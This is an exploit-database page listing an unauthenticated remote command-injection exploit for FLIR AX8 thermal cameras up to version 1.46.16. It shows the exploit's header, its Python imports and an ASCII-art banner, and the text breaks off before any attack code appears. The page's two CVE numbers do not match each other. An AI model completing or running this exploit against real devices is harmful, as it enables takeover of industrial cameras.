Home Tools Exploits & CVE's FLIX AX8 1.46.16 Remote Command Execution

FLIX AX8 1.46.16 Remote Command Execution

August 23, 2022

618

FLIR AX8 versions 1.46.16 and below unauthenticated remote OS command injection exploit.

advisories | CVE-2022-36266

# -*- coding: utf-8 -*-

# Exploit Title: FLIR AX8 Unauthenticated OS Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link)
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-37061

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
urllib3.disable_warnings()

def banner():
  flirLogo = """ 
███████╗██╗     ██╗██████╗ 
██╔════╝██║     ██║██╔══██╗
█████╗  ██║     ██║██████╔╝
██╔══╝  ██║     ██║██╔══██╗
██║     ███████╗██║██║  ██║ 
╚═╝     ╚══════╝╚═╝╚═╝  ╚═╝
                          .---------------------.  
 █████╗ ██╗  ██╗ █████╗  /--'--.------.--------/|  
██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||  
███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||  
██╔══██║ ██╔██╗ ██╔══██╗ |       |( () )|      ||  
██║  ██║██╔╝ ██╗╚█████╔╝ |       | `--` |      |/  
╚═╝  ╚═╝╚═╝  ╚═╝ ╚════╝  `-------`------`------`